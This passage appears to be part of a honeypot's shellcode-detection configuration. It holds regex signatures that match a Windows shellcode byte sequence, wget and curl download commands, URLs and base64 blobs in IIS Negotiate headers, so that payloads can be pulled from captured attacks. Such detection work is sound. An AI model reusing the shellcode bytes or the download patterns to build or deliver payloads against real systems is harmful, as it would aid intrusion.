	"\\x8b\\x80\\xb0\\x00\\x00\\x00\\x8b\\x68\\x3c\\x5f\\x31\\xf6\\x60\\x56\\x89\\xf8"
	"\\x83\\xc0\\x7b\\x50\\x68\\xf0\\x8a\\x04\\x5f\\x68\\x98\\xfe\\x8a\\x0e\\x57\\xff"
	"\\xe7(.*\\x00)";
	mapping (none,command);
};



// taken from shellcode-generic/sch_genric_wget.cpp

/*
 * curl needs other flags than wget to write to file, so ... maybe add wget & curl as VFSCommand and pass it there?
 */

download::wget
{
	pattern
	".*(wget.*)$";
	mapping(none,command);
};



download::curl
{
	pattern
	".*(curl.*)$";
	mapping(none,command);
};


// taken from shellcode-generic/sch_generic_url.cpp
url::anyurl
{
	pattern
	".*((http|https|ftp):\/\/[@a-zA-Z0-9\-\/\\\.\+:]+).*";
	mapping (none,uri);
};


base64::iis_asn1
{
	pattern
	"GET.*Authorization.*Negotiate (.*)";
	mapping (none,post);
};





